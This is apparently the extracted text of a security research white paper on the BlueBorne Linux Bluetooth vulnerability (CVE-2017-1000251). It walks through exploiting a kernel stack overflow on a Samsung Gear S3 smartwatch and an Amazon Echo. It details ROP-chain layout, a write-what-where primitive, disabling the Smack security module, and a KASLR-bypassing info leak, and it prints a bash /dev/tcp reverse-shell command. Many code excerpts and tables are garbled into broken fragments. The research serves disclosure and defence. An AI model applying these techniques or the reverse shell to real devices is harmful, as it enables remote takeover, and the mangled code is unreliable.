eu-17-Seri-BlueBorne-A-New-Class-Of-Airborne-Attacks-Compromising-Any-Bluetooth-Enabled-Linux-IoT-Device-wp
eu-17-Seri-BlueBorne-A-New-Class-Of-Airborne-Attacks-Compromising-Any-Bluetooth-Enabled-Linux-IoT-Device-wp
Exploitation 9
Case Study #1 - Samsung Gear S3 9
Extracting the smartwatch kernel 9
Leveraging stack overflow into PC control 10
From kernel to user-mode 13
Aarch64 Return-Oriented-Programming 13
Structural considerations 14
SMACK 19
Case Study #2 - Amazon Echo 22
Getting out of bounds 23
Analyzing the stack 23
Developing Write-What-Where 25
Putting it all together 27
Case Study #n - Defeating modern mitigations 28
A new information leak vulnerability in the kernel 28
Conclusions 30
This white paper will elaborate upon the Linux RCE vulnerability (CVE-2017-1000251) and its
exploitation. The exploitation of this vulnerability will be presented on two IoT devices - a
Samsung Gear S3 Smartwatch, and the Amazon Echo digital assistant.
Following the disclosure of the BlueBorne Linux vulnerabilities, patches have been committed to
the Linux Kernel (here) and the BlueZ userspace project (here).
Recently, we discovered another information leak vulnerability in the Linux Kernel and reported it
to Linux, which issued a patch for it as well. This vulnerability allows an attacker to bypass
mitigations that may exist on Linux machines, although in the case of IoT this may never be
necessary since they do not have such mitigations in the first place. These mitigations include
KASLR (Kernel Address Space Layout Randomization) and Stack Protectors.
In our initial findings, published in September, we stated that the Linux RCE vulnerability affects
all Linux Kernel versions starting at v3.3-rc1 and on. Since then, we have also found a way to
exploit this vulnerability in older Linux Kernels, starting at v2.6.32 and on, as we will present
below in the demonstration of the Amazon Echo exploit (which uses Kernel v2.6.37).
Accompanying this whitepaper is an exploit source code for these vulnerabilities, and the testing
framework used to exploit them, both of which are published here. The testing framework was
used to inject raw L2CAP packets - which was a necessary tool to exploit these vulnerabilities.
This framework can be used by other researchers to better test and audit the various
implementations of the lower layers of Bluetooth (ACL, L2CAP, etc.).
To fully understand the underlying facilities that allow exploitation of the Linux vulnerabilities, we
strongly recommend reading the full technical white paper, and especially the following sections:
Demystifying Discoverability, SDP and L2CAP.
Bluetooth is the dominating protocol today for short-range communications. It was introduced in
1998, and today approximately 8.2 billion devices use Bluetooth. The Bluetooth implementation
in Linux is called BlueZ and it exists in Linux since 2001. Linux is one of the first operating
systems to support Bluetooth natively, as an integral part of the OS. Since Linux is an open
source OS it is also used as the foundation for various OSs such as Samsung’s Tizen OS,
Amazon’s Fire OS, and others. The majority of IoT devices today are using Linux as the
underlying OS, either natively or as an underlying foundation, and so an IoT device that supports
Bluetooth will most likely be using BlueZ as its Bluetooth stack.
L2CAP
Overview
One of the lowest layers of any Bluetooth stack is L2CAP, responsible for managing connections
to the various Bluetooth services. L2CAP is Bluetooth's equivalent of TCP, as it manages
connections to the various services that exist in a Bluetooth stack, and provides some QoS
features for these connections.
When creating a new L2CAP connection, the two endpoints attempt to coordinate a concerted
configuration by passing packets called configuration requests and configuration responses back
and forth. A configuration request contains several elements which determine the exact type of
connection features which will be used.
In the example above , Device A requests a Maximum Transmission Unit (MTU) of 0x100, which
Device B accepts, followed by a request from Device B for an MTU of 0x200, which Device A
accepts as well. Two MTU parameters were agreed upon in this transaction - the maximum
message size of outgoing messages from Device A to Device B is 0x100, and the the maximum
message size of outgoing messages from Device B to Device A is 0x200.
While the above example is a simple exchange of parameters, a device might also choose to
reject an offered configuration request due to “unacceptable parameters”. To ease
re-negotiation, its configuration response may contain an alternative, acceptable value for the
parameter it wishes to change. For example, in the following code-snippet (from BlueZ), the
requested MTU value is checked against a minimum value (chan->omtu is initialized to a default
value when the connection is established):
3406
i
f
(
mtu<
L
2CAP_DEFAULT_MIN_MTU)
3407r
esult=
L
2CAP_CONF_UNACCEPT;
3408
e
lse
{
3409
c
han->omtu=
m
tu;
If the requested MTU value is valid, it is committed to the current connection settings and the
MTU configuration state is marked as CONF_MTU_DONE in the channel object, otherwise, the reply
value is set to UNACCEPT and the value is discarded. In either case, an MTU element is added to
the configuration response, reflecting a valid setting to the other side if the configuration is
rejected.
The above procedure is called “The standard configuration process” of L2CAP connections. In
this configuration process the endpoints will respond to a configuration request with a response
that either accepts or rejects the offered configuration. If a configuration was rejected, the
endpoints will continue to negotiate until they reach an agreed upon configuration.
However another type of configuration process exists - the lockstep configuration process. This
process is required to facilitate the Extended Flow Specification ( EFS) feature of L2CAP, which
allows devices to establish a more comprehensive connection. The EFS feature parameters will
need to be validated with each endpoint’s local Bluetooth controller, and so the endpoint’s
response to a configuration request may be “Pending”. Once both EFS parameters have been
exchanged between the endpoints, and the validation of EFS was achieved, a final response will
be returned by each of the endpoints.
switch
(type)
{
case
L2CAP_CONF_MTU:
//
Validate
MTU...
l
2cap_add_conf_opt(&
ptr
,
L2CAP_CONF_MTU,
2,
chan->imtu
);
break;
//
...
}
}
//
...
return
ptr
-
data;
}
Excerpt from l2cap_parse_conf_rsp (net/bluetooth/l2cap_core.c)
This function receives a configuration response buffer in the r sp argument, and its length in the
len argument. It extracts elements from the buffer one by one using the l 2cap_get_conf_opt
function, until the len argument runs out. Each element it unpacks from the configuration
response is validated and then packed back onto a response buffer, which is pointed to by the
data argument.
However, the size of this response buffer is not passed into the function.
Essentially, all elements in the rsp would be copied onto the data buffer via &ptr (offset to
l2cap_conf_req.data) regardless of the target’s buffer size.
Note that the size of the incoming response is not limited - elements can be duplicated, which
allows an attacker to control the size of the rsp buffer, and as a result the amount of data copied
onto data. The origin of the data buffer - l2cap_parse_conf_rsp is called from two locations, both
in a function called l2cap_config_rsp, which, as its name implies, handles configuration response
messages. Both invocations are similar, so both can be used to exploit this vulnerability, as we
will show with two exploit examples (Samsung Gear S3, and Amazon Echo).
switch
(result)
{
case
L2CAP_CONF_SUCCESS
:
...
break
;
case
L2CAP_CONF_PENDING:
set_bit(CONF_REM_CONF_PEND,&
chan->
conf_state);
if
(test_bit(
CONF_LOC_CONF_PEND,
&
chan
->
conf_state))
{
char
buf
[64];
len=
l
2cap_parse_conf_rsp(chan,r
sp
->
data
,
len,
buf
,
&
result);
...
gotodone;
Excerpt from l2cap_config_rsp (net/bluetooth/l2cap_core.c)
In the above excerpt, the configuration for the current channel is then tested for the “Pending”
state (as described above in the lockstep configuration process). So to access this flow, an
attacker needs his target to be in the “Pending” state, which he can achieve by triggering the
following code path:
i
f
(remote_efs) {
i f
(chan->
local_stype! =
L2CAP_SERV_NOTRAFIC&&
efs.stype
!=
L2CAP_SERV_NOTRAFIC&&
efs.stype !=
chan->
local_stype)
{
. ..
//Wedon’t
wantthis
branch,
easyto
avoid
}e
lse
{
/ *
S
end PENDING
ConfRsp
*/
result=L2CAP_CONF_PENDING;
set_bit( CONF_LOC_CONF_PEND,&
chan
->conf_state);
}
}
Excerpt from l2cap_parse_conf_req (net/bluetooth/l2cap_core.c)
This action is simple - an attacker only needs to send a configuration request with an EFS
element, setting the stype field to L 2CAP_SERV_NOTRAFIC. After the “Pending” state is reached,
the next configuration response sent with the result field set to L2CAP_CONF_PENDING will
trigger the vulnerability in this flow, leading buf[64] to be overwritten with an arbitrarily sized
buffer.
This vulnerability allows an attacker to overflow a 64 byte buffer on the kernel stack by an
unlimited amount of data, so long as it conforms to the structure of a valid L2CAP configuration
response.
Impact
In BlueZ’s case, L2CAP is included as part of the core Linux kernel code. This is a rather
dangerous choice. Combining a fully exposed communication protocol, arcane features like EFS
and a kernel space implementation is a recipe for trouble. This vulnerability is a classic stack
overflow occurring in the context of a kernel thread. As we will demonstrate with the devices we
exploited, the most common case in IoT devices today is a complete lack of mitigations against
stack overflows in their kernels. Moreover, when combining this vulnerability with another
vulnerability that leaks data from the stack (as the one presented below), also means all
unpatched Linux devices are susceptible to complete take over using this vulnerability and its
likes - even if they use stack protectors, or KASLR in their kernel builds.
Exploitation
We chose to exploit two real-life consumer devices to evaluate what it takes to use this
vulnerability to a complete takeover these devices. Both devices use the BlueZ stack - but since
they are based on different kernel versions, and since they run on different processors, they
required different exploits.
The Gear S3 runs Tizen, Samsung's own mobile OS. The
unit that we tested was running the Tizen v2.3.2.1 that is
based on the Linux kernel v3.18, on a Dual Core Exynos
7270 Aarch64 (64bit ARM) processor.
We dumped the entire partition and loaded the dump in IDA, rebasing correctly with the help of
offsets from /proc/kallsyms which was readily available:
The combination of these two factors lead to an ironic turn-of-fate - the first overflowed byte of
the target buffer would be the stack frame itself - leading to PC control.
In 64 bit ARM (Aarch64), the stack frame is arranged so the previous return address and
stack-frame pointer are stored at the "bottom" of the current stack frame, followed by saved
registers, and then by the current function’s stack variables/buffers.
To provide some context - in Aarch64, the x29 and x30 registers are used to store the current
functions frame pointer and return address. A ret instruction could also be viewed as branching
to x30. Registers are stored on the stack using the stp/str and ldp/ldr instructions. These
instructions are also able to add or subtract from the address register, for pop/push functionality.
Typical function prologue
Upon entering a function, 0x40 bytes are subtracted from SP to create a stack frame (note the ‘!’
in the first stp
instruction), and the x29 and x30 registers are stored at the “base” of this frame.
The rest of the saved registers are stored directly after, creating the following stack layout
-0x08 frees
tack
SP savedf
ramep
ointer-
x29
+0x08 savedr
eturna
ddress-
x
30
+0x10 savedx
19
+0x18 savedx
20
+0x20 savedx
21
+0x28 savedx
22
+0x30
stackv
ars
+0x38
+0x40 previouss
tackf
rame
So, a stack overflow will result in overwriting the previous stack frame and the return address of
the function directly above us in the call stack. Remember that the buffer we’re overflowing does
not belong to the function where the overflow occurs, but rather to the function that called it. In
addition, since most functions in this code path are declared as inline, the buffer we’re
l2cap_parse_conf_rsp
saved
frame,
ret,
and
registers
l2cap_recv_frame
saved
frame,
ret,
and
registers
stackv
ars
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA
targetb
uffer-
b
uf[64]
AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
l2cap_recv_acldata previouss
tackp
ointer-
x
29
returna
ddress-
>h
ci_rx_work
In newer versions of Linux, you can even find a nifty wrapper in kernel/reboot.c called
run_cmd , which will call a
rgv_split on your behalf and even handle the envp parameter before
invoking call_usermodehelper .
static
i
nt
run_cmd
(const
char
*cmd)
{
...
//
argv_split
and
call_usermodehelper
}
In our version of the kernel this function does not exist, but the _
_orderly_poweroff and
__orderly_reboot functions execute similar logic (argv_split and call_usermodehelper )
on pre-defined strings.
If we can overwrite one of these pre-defined strings and then invoke its respective function, we
should be able to execute an arbitrary command in user-mode, with existing code doing all the
heavy lifting for us.
Luckily, the poweroff_cmd string that is run by __orderly_poweroff is located in writeable
memory, on account of being mapped to /proc for modifications from user-mode.
We did however had to make sure that the force argument for _ _orderly_poweroff was set to
false, to avoid actually shutting down the device.
static
int
__orderly_poweroff (boolf
orce)
{
.
..// a
argv_split nd o
call_usermodehelper n
poweroff_cmd
}
Aarch64 Return-Oriented-Programming
At this point, we have PC and stack control. Since Kernel base randomization (KASLR) was not
enabled on this kernel (as is common to most kernels prior to v4.12) - all that was left at this point
is to assemble a ROP chain.
BlueBorne on Linux | © 2017 ARMIS | 13
Traditionally, we would try to leverage ROP execution into shellcode execution in kernel-mode.
In the case of this PoC, our goal was to export a connectback shell over the WiFi network. Since
this could be accomplished with relative ease in user-mode, we elected to “skip” the shellcode
part and stick with ROP execution for our pivot to user-mode.
Having already extracted a copy of the kernel and rebased it correctly with the help of
/proc/kallsyms , all that remains is finding gadgets to help us perform the following actions:
1. Overwrite the poweroff_cmd string with our own command.
2. Invoke __orderly_poweroff , with the force argument set to 0.
a. Set x0 (the first argument register) to 0.
b. Call __orderly_poweroff (false) .
3. Restore or stop execution of the running thread.
The size of the ROP chain turned out to be an important consideration in this architecture, since
the vast majority of function epilogues remove two 64 bit words from the stack into x29 and x30.
This means that the minimum size added to the payload for even a basic gadget is 16 bytes.
Any register pair (or even a single register, due to padding) added to the gadget would cost an
additional 16 bytes.
Structural considerations
The biggest challenge in assembling a functional ROP chain was the fact that it also has to be
formatted as a series of valid configuration elements - an invalid element would cause the copy
loop in l2cap_parse_conf_rsp to break.
Most of the elements parsed by the loop are 2 bytes in size, discounting the 2 byte
l2cap_conf_opt header. There are also two larger elements described by the EFS (extended
flow) and RFC (retransmission and flow-control) structs, the former being the larger of the two:
struct
l2cap_conf_opt
{ struct
l2cap_conf_efs{
_
_u8t
ype; _
_u8i
d;
_
_u8l
en; _
_u8s
type;
_
_u8v
al[0]; _
_le16m
sdu;
}_
_packed; _
_le32s
du_itime;
_
_le32a
cc_lat;
_
_le32f
lush_to;
}_
_packed;
c
ase
L2CAP_CONF_EFS:
i
f(
olen=
=
sizeof(efs))
memcpy
(&efs,(
void*)val,o
len);
i
f
(
chan->local_stype!=L2CAP_SERV_NOTRAFIC&
&
e
fs.
stype!
=L
2CAP_SERV_NOTRAFIC&&
e
fs.
stype!
=c
han->local_stype)
r
eturn
-ECONNREFUSED;
l
2cap_add_conf_opt
(&ptr,L
2CAP_CONF_EFS,s
izeof(efs),
(
unsignedl
ong)&
efs);
b
reak
;
..._to
XXX
X
opt header + EFS struct - The green XXs represent bytes in our control
If we chain several of these EFS elements in succession - we arrive at the following stack control
pattern:
0000:1 06 10 XX 00 XX XX XX XX
0008:2 XX XX XX XX XX XX XX XX
0010:3 XX XX 06 10 XX 00 XX XX
0018:4 XX XX XX XX XX XX XX XX
0020:5 XX XX XX XX 06 10 XX 00
0028:6 XX XX XX XX XX XX XX XX
0038:8 XX 00 XX XX XX XX XX XX
0040:9 XX XX XX XX XX XX XX XX
If observed as a 9 word long ROP chain - we only fully control every other word for the first 6
words, followed by 2 partially-controlled words and 1 more fully controlled word.
However, recall that the typical gadget pops pairs of registers off the stack - so this sparse
control pattern actually works out quite nicely for us, even without using the 8th word.
For example, consider the way the following chain of gadgets applies to our control pattern:
x29 Not
controlled
ldp
x19,
x20,
[sp,
#0x10]; x30 Controlled
ldp
x29,
x30,
[sp],
#0x20;
ret;
pop
2
registers x19 Not
controlled
x20 Controlled
x29 Not
controlled
x30 Controlled
ldp
x19,
x20,
[sp,
#0x10];
ldp
x21,
x22,
[sp,
#0x20]; x19 Not
controlled
ldp
x29,
x30,
[sp],
#0x30;
x20 Not
controlled
ret;
pop
4
registers
x21 Controlled
x22 Not
controlled
x29 Controlled
ldp
x19,
x20,
[sp,
#0x10]; x30 Not
controlled
ldp
x29,
x30,
[sp],
#0x20;
ret;
pop
2
registers x29 Controlled
x30 Not
controlled
As you can see, while we do not fully control the content of the odd numbered registers (x29,
x19), we do have full control of the even registers (x30, x20). However, this “polarity” is reversed
in the middle of the chain on account of the two consecutively uncontrolled words.
This is where the MTU element comes to the rescue - it’s a 16 bit integer, so together with its
l2cap_conf_opt header it is 4 bytes in size.
Putting two MTU elements together allows us to carefully weave another 8 byte word into the
ROP chain, between two EFS structs - omitting control of an additional word, but evening out the
word count and allowing us to reset polarity:
0000:1 06 10 XX 00 XX XX XX XX x29
0018:4 XX XX XX XX XX XX XX XX x20
0020:5 XX XX XX XX 06 10 XX 00 x29
0028:6 XX XX XX XX XX XX XX XX x30
0048:10 XX XX XX XX XX XX XX XX x22
0050:11 06 10 XX 00 XX XX XX XX x29
0068:14 XX XX XX XX XX XX XX XX x20
Thanks to the addition of the two MTU elements (in orange), we are able to maintain an even
word count with 8 byte alignment, thus maintaining control of x 30, the link register.
Recalling our plan from before - we now need to overwrite the poweroff_cmd command,
located at a predetermined memory location, with our own payload.
At first, we attempted to deliver the payload by pulling an additional packet from the
socket-buffer queue by calling skb_dequeue , and copy its content onto poweroff_cmd ’s
address, but this idea was quickly forsaken due to the race between the dequeue operation and
the packet actually arriving through the Bluetooth stack, which impacted reliability.
The following two gadgets, in succession, allow us to write 8 arbitrary bytes to an arbitrary
address, while also maintaining the correct “polarity”:
write-
what
-where
str
x22
,
[x
20
,
#0x40];
ldp
x19,x
20
,
[s
p
,
#0x10];
ldp
x19,
x20,
[sp,
#0x10];
ldp
x21,x
22
,
[s
p
,
#0x20];
ldp
x21,
x22,
[sp,
#0x20];
ldp
x29,
x30,
[sp],
#0x30;
ldp
x29,
x30,
[sp],
#0x30;
ret;
ret;
This equates to *(uint64_t*)(x20 + 0x40) = x22
The only other gadgets we used were to call arbitrary functions, and to null the x0 register using
a function call - for the force
argument passed to __orderly_poweroff :
function-call(s)
blr
x20; blr
x22;
ldp
x19,
x20,
[sp,
#0x10]; ldp
x19,
x20,
[sp,
#0x10];
ldp
x21,
x22,
[sp,
#0x20]; ldp
x21,
x22,
[sp,
#0x20];
ldp
x29,
x30,
[sp],
#0x30; ldp
x29,
x30,
[sp],
#0x30;
ret; ret;
null-x0
blr
x2
?;
mov
x0,
#0;
ldp
x19,
x20,
[sp,
#0x10]; ret;
ldp
x21,
x22,
[sp,
#0x20];
ldp
x29,
x30,
[sp],
#0x30;
ret;
To end the ROP chain, we elected to simply execute an infinite loop (ret without popping x 30).
1. In our running context (kernel work-queue thread) this works OK, and only affects the
Bluetooth kernel work-queue. Restoring proper execution can be achieved relatively
easily post-exploitation.
Applying these gadgets to our plan from before, and adding the payload, we end up with the
following ROP chain:
2. Multiple write-what-where gadgets to write an arbitrary string to &poweroff_cmd
3. function-call to null-x0 (to set the force argument to false)
4. function-call to invoke __orderly_poweroff (false);
5. Endless loop
BlueBorne on Linux | © 2017 ARMIS | 18
The smartwatch’s default shell is a bash equivalent, so we simply redirected a bash session to
/dev/tcp in the following manner:
/bin/bash
-c
/bin/bash</dev/tcp/[ip]/[port]
Followed by “exec bash -i 2>&0 1>&0” on the now open connectback shell.
This helped us minimize the size of the payload as every 8 bytes of string resulted in 0x70 bytes
worth of ROP chain.
SMACK
When running the exploit, we encountered issues exporting a root shell.
We were able to:
● Touch files in /tmp as root, using the exploit.
● Export a connectback shell with bash redirection as the developer user, using the SDB
shell.
But we were not able to:
● Export a connectback shell as root, using the exploit.
● Receive an incoming connection as root, using the exploit.
So while the exploitation was successful and we were clearly running a command, something
else was stopping the connection, among other actions we attempted.
After digging around the smartwatch a bit more, we realized that Tizen has S
mack enabled by
default.
Smack, or Simplified Mandatory Access Control in Kernel, is a Linux Security Module (LSM) which
implements access control features. Similar to (but less robust than) SELinux, Smack allows
configuration of access control policies in the form of labels or security contexts.
In practice - daemons, applications, files, and network locations are demarcated using different
labels with well-defined relationships.
To illustrate, let’s observe the relationship between the Bluetooth application label and the
sound_server
alon@nuc
:~$c
atsmack_rules|
g
rep-
eb
luetooth|
g
rep-
es
ound_server|
g
rep-
vt
est
sound_servercom.samsung.bluetooth
rx
com.samsung.bluetoothsound_server
rw
According to these two rules - anything in the com.samsung.bluetooth label group may read
and write to anything in the sound_server label group.
Likewise, objects with the sound_server label may read and execute objects with the
com.samsung.bluetooth label.
The “_” symbol refers to the “floor” label, which is applied to system tasks.
The “floor” label is fairly privileged, however, we were still obstructed by the netlabel feature of
Smack, which allows labeling of network addresses.
sh-3.2$c
at/
smack/netlabel alon@nuc
:~/bluetooth$c
at.
./smack_rules|
g
rep
10.0.2.2/32s
ystem::debugging_network -e"
s
ystem::use_internet"|t
ail
10.0.2.16/32system::debugging_network
127.0.0.1/32-CIPSO com.samsung.calls
ystem::use_internetr
192.168.129.3/32system::debugging_ne... clatds
ystem::use_internetr
w
0.0.0.0/1s
ystem::use_internet com.samsung.bluetooths
ystem::use_internetr
128.0.0.0/1s
ystem::use_internet fidos
ystem::use_internetr
w
Output from the smartwatch netlabel policy, and corresponding label policies (truncated)
Examining the policy from the smartwatch, we can see that the system::use_internet label is
the only one that’s fully privileged to access the network, and that several labels are allowed to
interact with it.
Unfortunately no rule to allow the “floor” label to access the internet were defined, which was
what prevented us from exporting a shell from that context, but not from the “sdbd” context
under which the SDB shell runs.
As mentioned before, Smack is implemented as a Linux Security Module (LSM) - essentially a set
of hooks to instrument relevant APIs. For example, connect and sendmsg are both instrumented
to validate the destination address versus the aforementioned netlabel rules.
Fortunately, the Linux kernel provides us with a function to “reset” the currently applied LSM:
void
reset_security_ops
(void)
{
s
ecurity_ops=&
default_security_ops;
}
This essentially kills the active LSM and disables all its hooks - with one function call.
To be fair - Smack is not constructed to fend off an attacker executing code in ring-0, at which
point it’s usually game-over.
The second device we chose to exploit is the Amazon Echo. The Echo runs an
ARM 32 bit processor (TI DM3725), and is based on a much older Kernel than the
Gear’s - Kernel version 2.6.37.
Similarly to the Gear, there is no stack protectors in the Kernel’s build and no
KASLR. Unlike the Gear - there are even fewer mitigations in the Echo:
It does not use GCC’s FORTIFY_SOURCE, it does not use any LSM modules (like
SMACK), and for some unknown reason - it does not have proper use of the NX-bit
(!) that is used to prevent execution of data pages as code. This means that once
we have control of the PC in this build - we can simply jump to a shell code placed
directly on the stack! Just as we did back in the good old days :)
Despite these pleasing news that will surely ease exploitation, it appeared the
Echo’s old kernel version did not yet have the EFS feature in L2CAP that was
committed to the kernel only in version 3.3-rc1.
At first this seemed quite un-exploitable as the only call to the vulnerable
l2cap_parse_conf_rsp that exist in this version of the kernel is this:
switch
(result){
...
case
L2CAP_CONF_UNACCEPT :
...
charreq
[64];
if
(len
>sizeof(req)
-
sizeof(structl2cap_conf_req)){
l2cap_send_disconn_req(conn,sk,
ECONNRESET);
goto
done;
}
result=
L2CAP_CONF_SUCCESS;
len=
l2cap_parse_conf_rsp(chan,
rsp
->data
,
len,
req
,
&
result);
...
In the highlighted if above it is apparent that this flow in l2cap_config_rsp limits the incoming
configuration response messages to 60 bytes - which would suggest that overflowing the 64
byte r eq buffer would not be possible. However, diving deeper into the implementation of
l2cap_parse_conf_rsp a new primitive to overcome this limitation arises.
l
2cap_add_conf_opt
(&ptr
,
L2CAP_CONF_RFC,
sizeof
(rfc),
(unsignedlong)
&
rfc);
b
reak
;
...
In the above excerpt from l2cap_parse_conf_rsp , each time a configuration element is parsed
in the while loop l2cap_get_conf_opt returns the olen (element length) and val (element
value) of the current element. Regardless of the incoming length of the current element, a
configuration element will be appended to configuration response using it’s default size. For
example, if a configuration element of type L 2CAP_CONF_RFC is parsed in the w hile loop, an
outgoing element with the same type will be appended with s izeof (rfc) (which is 9 bytes) in
it’s payload. The i f statement in the L
2CAP_CONF_RFC case only validates that the m emcpy is
done for the proper size. So by sending a zero-length RFC element, we can advance the output
ptr by 11 bytes (2 header bytes + 9 payload bytes) - but only “spend” 2 bytes for the
configuration element’s header.
struct
l
2cap_conf_opt
{ Zero-Length
RFC
conf_opt:
__u8
type; \x04
(
L2CAP_CONF_RFC
)
__u8
len; \x00
__u8
val[0];
}
__packed;
This trick allow us to get out of the req
buffer’s boundaries: Sending the maximum 30 zero-length
RFC elements (that will amount to 60 bytes in the configuration response) will create an output
configuration request of 330 bytes (11 * 30), which will be substantially past the end of the buffer’s
size (64 bytes).
l2cap_recv_frame stackv
ars
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA
targetb
uffer-
r
eq[64]
AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
stackv
ars
ptr(
stackv
ar)
saved
registers,
saved
frame,
and
return
address
l2cap_recv_acldata previousf
rame,s
tackv
ars
s
tatic
int
l
2cap_parse_conf_rsp (struct
l2cap_chan *chan,
void
*rsp,
int
len,void
*data,u16
*result)
{
struct
l2cap_conf_req*req=
data;
void
*
ptr
=req->data
;
//
...
while
(len
>=L2CAP_CONF_O
PT_SIZE){
len
-=l2cap_get_conf_opt(&rsp,&type,&olen,
&val);
switch
(type){
...
case
L2CAP_CONF_RFC:
...
l
2cap_add_conf_opt
(&ptr
,
L2CAP_CONF_RFC,
sizeof
(rfc),
(unsignedlong)
&
rfc);
b
reak
;
...
Each time l2cap_add_conf_opt is called, a configuration element is written to this ptr
, and it is
then incremented accordingly. So by overflowing p tr we could control where the next
configuration element would be copied to. Seemed like the perfect candidate for a
write-what-where primitive.
Developing Write-What-Where
Using the zero-length-RFC primitive we can now overflow the r eq buffer and reach the ptr
variable. However, a little more manipulation was needed:
DE08 req 04 09 UC UC
DE0C UC UC UC UC
DE10 UC UC UC 04
DE14 09 UC UC UC
DEF8 UC UC 04 09
DEFC UC UC UC UC
DF00 UC UC UC UC
DF04 ptr UC 04 09 XX
DF08 XX XX XX XX
DF0C R4 XX XX XX XX
l2cap_recv_frame
stack frame of the Amazon Echo
In the above stack frame illustration - XX bytes are attacker controlled 0409 are uncontrolled
configuration element header bytes, and UC bytes are configuration element payload bytes,
which are also uncontrolled bytes. This stack frame shows illustrates that sending 24 zero-length
RFC elements will achieve to overflow the p tr variable - but with uncontrolled bytes. To control
the value of p tr we would need to align our overflow a bit:
DEEC UC UC UC 04 ←
RFC#22
DEF0 09 UC UC UC
DEF4 UC UC UC UC
DEF8 UC UC 02 02 ←
FLUSH#1
DEFC UC UC 02 02 ←
FLUSH#2
DF00 UC UC 02 02 ←
FLUSH#3
DF04 ptr XX XX -- --
By sending 22 zero-length RFC elements, and additional 2 zero-length FLUSH elements, we are
able to overflow the lower 2 bytes of ptr with attacker controlled data (carried in an additional
FLUSH#3 element - that will not be zero-length). Since the Echo is ARM little-endian, this allows
us to move the p tr to almost anywhere in the stack, as the 2 higher bytes of it will be left
untouched. Any additional configuration element placed after the 3rd FLUSH element will than be
Wireshark screenshots of the crafted L2CAP message containing multiple configuration response commands
Defeating the side effect of the additional \x02\x02 bytes written before each write can be
achieved by doing our writes in reverse order, so that only 2 extra bytes are left at the start of
each consecutive write.
static
i
nt
l2cap_parse_conf_rsp (
struct l2cap_chan
*
chan,v
oid
*
rsp,i
nt
len
,
v oid
*
data ,u
16*result)
{
...
struct
l2cap_conf_efs
efs
; //<
-
Uninitialized
...
while
(
len>=
L2CAP_CONF_OPT_SIZE ){
...
len
-=l2cap_get_conf_opt (&
rsp,&type,&olen, &
val);
...
switch
(type)
{
caseL
2CAP_CONF_EFS :
i
f(
olen=
=
sizeof (
efs))
memcpy
(&efs,
(
void
*)
val ,
olen);
...
l
2cap_add_conf_opt (&ptr,
L2CAP_CONF_EFS ,sizeof(
efs),
(unsigned
long)
&efs);
...
In the above code, olen is the size of the configuration element that is currently being parsed,
and the highlighted if verifies that the efs element would only be written with the received
element’s payload if the the size of that element is exactly the size of the efs struct. Regardless of
In the screenshot below, we can see an example of this vulnerability being exploited against the
Samsung Gear S3 device:
Wireshark capture showing the returned Configuration Request with an uninitialized EFS element
The 16 bytes of data in the EFS option above are actually uninitialized data from the stack, and in
fact the last 8 bytes (highlighted in red) are some pointer to the code section, that was leaked
from the uninitialized stack variable e fs .
It is important to note that manipulating the stack in such a way that allows bypassing of
mitigations is not necessarily a simple task, since it requires the attacker to control which code
flows precede the call to the vulnerable l 2cap_parse_conf_req function - and which will be
responsible for what data will be left in the uninitialized bytes on stack to which e fs would later
be allocated. This will also be dependent on the specific kernel build and the specific code layout
of that build.
However, a determined attacker can find ways to shape the code flow to selectively leak data
from the stack - including the stack protector itself, if used in the targeted device.
In a similar manner, the leaked stack data may also include pointers to code (as in the above
screenshot), data, or any other sections relevant to the attack. Using these pointers, an attacker
can deduce the base addresses of the various sections, and bypass KASLR as well.
BlueBorne on Linux | © 2017 ARMIS | 29
Conclusions
During our research into the Bluetooth stack and implementation, and the subsequent research
aimed at exploiting consumer devices, several topics that we believe merit further attention
surfaced.
The Bluetooth specification, albeit being almost 3000 pages long, does not adequately detail
many implementation aspects, creating considerable room for developer-interpretation.
This opens the door for a great deal of potential pitfalls and developer errors to occur.
In the case of the vulnerability discussed in this writeup, for instance, to prevent this
implementation error from ever occurring, it would have sufficed for the standard to strictly
specify that configuration elements cannot be duplicated.
Despite the ample availability of mitigations and hardening features, most Linux based devices
offer very little resistance to attacks like the one demonstrated above.
An attacker exploiting a run-of-the-mill kernel stack overflow - certainly a very outdated
vulnerability class - faces almost no obstacles in leveraging code execution.
The complexity and therefore the cost of exploiting a simple kernel stack overflow is increased
when features like KASLR and stack-canary protection are enabled, and with little to no
disadvantages. Having said that - attackers would ultimately find ways to bypass mitigations, as
we have shown in the case of the last information leak vulnerability we found. This means there is
no substitute for properly auditing the code of Bluetooth implementations, and verifying they do
not contain potentially devastating vulnerabilities.